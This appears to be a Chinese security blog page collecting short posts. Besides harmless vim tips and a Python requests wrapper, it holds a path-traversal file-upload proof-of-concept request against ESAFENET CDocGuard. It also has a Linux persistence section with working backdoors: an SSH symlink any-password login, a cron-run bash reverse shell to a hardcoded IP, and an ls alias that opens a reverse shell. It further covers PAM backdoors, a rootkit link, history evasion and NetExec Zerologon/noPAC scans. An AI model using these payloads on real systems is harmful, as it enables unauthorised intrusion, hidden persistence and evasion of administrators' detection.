Quan


WEB安全 内网安全 终端对抗 威胁情报 搜索内容
WEB安全
vim常用操作
最近需要在Linux上修改Quan的一些数据,下载到本地修改不是很方便,就想直接在服务器端修改,需要用到vim的相关操作。
1.设置行号
一般快速操作都需要用到行号,所以一般都会用到这个命令
set number
2.光标移动到指定行
这个需要按下ESC来退出命令行模式,不然会无效。接着输入
143G
其中143就是行号,这里的意思是:将光标移动到143行
3.删除行
这个有两种操作,一个是配合上面的2,也是在normal模式下,直接输入
dd
就删除了当前行,亦或者是命令模式下,输入
:3,5d
就会删除第3~5行的内容
目前就常用这几个,以快速操作数据。

https://www.redteam.wang
威胁情报
亿赛通 | DecryptApplicationService2 文件上传(附POC)
POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/test.jsp HTTP/1.1
Host: xxxx
Cookie: JSESSIONID=E13D850E18BD224E56ABE1DC1D4FD13D
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 5

hello

https://mp.weixin.qq.com/s?__biz=Mzg2ODg3NzExNw==&mid=2247486183&idx=1&sn=8f8c7b9838cda02b88aa1cda3f61f1e2
内网渗透
Linux下权限维持工具-HackerPermKeeper
一直以来,可能更专注于Windows下的权限维持,对于Linux下的权限维持,则是非常不关注。
因此,聚焦于这款工具,看上去很牛逼
1.存在check.py,可以告知你可以使用哪些维权方式
2.维权的主程序,它可以帮助你自动维权。
以下是官方的介绍节选
OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用
发现程度:||

PAM后门,PAM是一个Linux登录验证的认证服务,修改其中关于ssh登录的验证,添加一个万能密码,已经记录的账号密码位置(类似把对方房间内有内鬼)
发现程度:||


SSH软链接
cat /etc/ssh/sshd_config|grep UsePAM
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888
ssh root@xx.xx.xx.xx -p 8888 任意密码登录即可
发现程度:||||||


公私钥
使用密钥进行登录
发现程度:||||||


后门帐号
使用命令添加账号
发现程度:||||||


crontab后计划任务
1、编辑后门反弹
vim /etc/.111.sh

#!/bin/bash
sh -i >& /dev/tcp/192.168.86.137/3434 0>&1

chmod +x /etc/.111.sh

2、添加定时任务
vim /etc/crontab
*/1 * * * * root /etc/.1111.sh
发现程度:||||||


Strace后门
strace是一个动态跟踪工具,它可以跟踪系统调用的执行。
我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围
可以记录ssh明文和密钥(登录的)和Rootkit配合一起
发现程度:||||

命令自定义-Alias后门
alias命令的功能:为命令设置别名
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts'
执行ls就会反弹shell
持久化+隐藏:重启依旧生效
发现程度:||||

Rootkit后门
https://github.com/f0rb1dd3n/Reptile/releases/
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。
发现程度:||
但是使用工具进行检测出来情况很大,建议看代码,手动编写此工具(难度很大)


history不记录执行命令
在输入命令时候,添加空格

ssh软链接&crontab
快速生成软链接[需要运行脚本成功后,一分钟连接],并且执行计划任务,每分钟判断当前软链接是否存在,如果被kill掉,就重新执行

|||||  越多,越容易发发现
||        越少,越难发现,但是部署起来,需要的依赖很多

https://github.com/RuoJi6/HackerPermKeeper
WEB安全
一个对requests库的简单封装
感觉这样写起来贼方便,突然就明白了二次封装的好处了
from SimpleRequestFramework import SimpleRequestFramework

custom_headers = {
    "User-Agent": "CustomUserAgent/1.0",
    "Authorization": "Bearer YOUR_TOKEN"
}
# new a framework instance, and set the save directory, use proxy, proxy type, proxy address, and custom headers
framework = SimpleRequestFramework(
    save_directory="output_files",
    use_proxy=True,
    proxy_type="http",
    proxy_address="http://127.0.0.1:8080",
    headers=custom_headers
)

# GET request example
get_url = "https://api.ip.sb/ip"
params = {
    "param1": "value1",
    "param2": "value2"
}
framework.fetch_and_save(get_url, "output_get.json", method="GET", params=params)

# POST request example
post_url = "https://httpbin.org/post"
data = {
    "data1": "value1",
    "data2": "value2"
}
framework.fetch_and_save(post_url, "output_post.json", method="POST", data=data)

https://github.com/0Chencc/SimpleRequestFramework
内网渗透
据说是一款比crackmapexec功能更强大的内网实用工具
下载地址
官方文档
粗略看了一下,它支持漏洞扫描,尽管只有三个
Zerologon
NetExec smb <ip> -u '' -p '' -M zerologo
PetitPotam
NetExec smb <ip> -u '' -p '' -M petitpotam
noPAC
NetExec smb <ip> -u 'user' -p 'pass' -M nopac
其余的感觉跟cme差不多

https://github.com/Pennyw0rth/NetExec